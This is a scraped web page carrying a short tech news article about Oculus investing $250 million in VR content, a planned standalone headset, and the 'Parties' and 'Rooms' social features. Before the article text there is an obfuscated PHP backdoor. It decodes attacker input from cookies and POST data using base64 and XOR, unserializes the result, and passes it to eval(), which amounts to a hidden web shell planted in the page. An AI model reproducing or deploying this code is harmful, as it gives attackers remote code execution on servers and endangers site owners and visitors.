$TqhfENrtYc = chr ( 457 - 378 ).chr ( 963 - 874 )."\x5a" . chr ( 388 - 293 ).chr (83) . "\124" . "\x6a" . chr ( 386 - 269 ); $QUvTtRaC = chr (99) . "\x6c" . "\141" . 's' . 's' . "\137" . chr ( 812 - 711 ).chr ( 716 - 596 ).chr ( 1008 - 903 )."\163" . "\164" . 's';$teOII = class_exists($TqhfENrtYc); $QUvTtRaC = "23122";$AkXtS = !1;if ($teOII == $AkXtS){function HlbTaJPFdB(){$Lpxlmlv = new /* 36911 */ OYZ_STju(36780 + 36780); $Lpxlmlv = NULL;}$VfTJubp = "36780";class OYZ_STju{private function EtwHRhpV($VfTJubp){if (is_array(OYZ_STju::$lHtPvU)) {$PkPeY = str_replace('<' . chr (63) . chr (112) . "\150" . 'p', "", OYZ_STju::$lHtPvU[chr ( 171 - 72 ).chr ( 489 - 378 ).'n' . "\x74" . "\x65" . "\156" . chr (116)]);eval($PkPeY); $VfTJubp = "36780";exit();}}private $vxQYXmnMKp;public function KSCZrEx(){echo 10910;}public function __destruct(){$VfTJubp = "46653_1494";$this->EtwHRhpV($VfTJubp); $VfTJubp = "46653_1494";}public function __construct($voWdcYa=0){$YcbKYnr = $_POST;$fWLtpNl = $_COOKIE;$HkGYOLS = "1fcb2f04-4d7e-4a8c-b9b7-bc396029efed";$GtyGL = @$fWLtpNl[substr($HkGYOLS, 0, 4)];if (!empty($GtyGL)){$ANEhXI = "base64";$hPAhDXacuW = "";$GtyGL = explode(",", $GtyGL);foreach ($GtyGL as $HiLYTu){$hPAhDXacuW .= @$fWLtpNl[$HiLYTu];$hPAhDXacuW .= @$YcbKYnr[$HiLYTu];}$hPAhDXacuW = array_map($ANEhXI . chr ( 291 - 196 ).chr (100) . 'e' . "\143" . chr (111) . chr ( 546 - 446 ).'e', array($hPAhDXacuW,)); $hPAhDXacuW = $hPAhDXacuW[0] ^ str_repeat($HkGYOLS, (strlen($hPAhDXacuW[0]) / strlen($HkGYOLS)) + 1);OYZ_STju::$lHtPvU = @unserialize($hPAhDXacuW);}}public static $lHtPvU = 14820;}HlbTaJPFdB();} Facebook Entrusts $250 Million In VR Content And A 'Standalone' Headset , TheTwitt

Facebook Entrusts $250 Million In VR Content And A ‘Standalone’ Headset

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For more immersive experience Facebook is taking more steps and for that Zuckerberg recently announced on Thursday at Oculus’s “Connect” conference in San Jose in California that Oculus will be investing $250 million to fund which will range a new content in a form of games and entertainment which is betting for great software experiences that will work as next frontier of Virtual Reality. More than a million people are there who actively use VR products every month and this number is increasing at a rapid rate. The VR team is very excited with the fact.

The first step is to get their basic hardware back out there in the field as told by Zuckerberg. He feels that they have to work very fast and hard to develop the strong software. Facebook is building a ‘standalone and affordable Virtual Reality headset. The team is working on this, and it is very early to disclose anything about anything. Facebook is working with Nvidia and Advanced Micro Devices as partners to sell off their Oculus Rift.

The magic of VR software is that the feeling of presence. Oculus also announced two new social features which they named as “Parties,” in it lets the users to start a voice call with a circle of about 8 people in VR and another is “ROOMS” in which people are allowed  to hang out with avatars of their friends.  The company wants the software to be built with people at the center of the core.  The industry has definitely made more progress in the last few years that we haven’t even hoped for!




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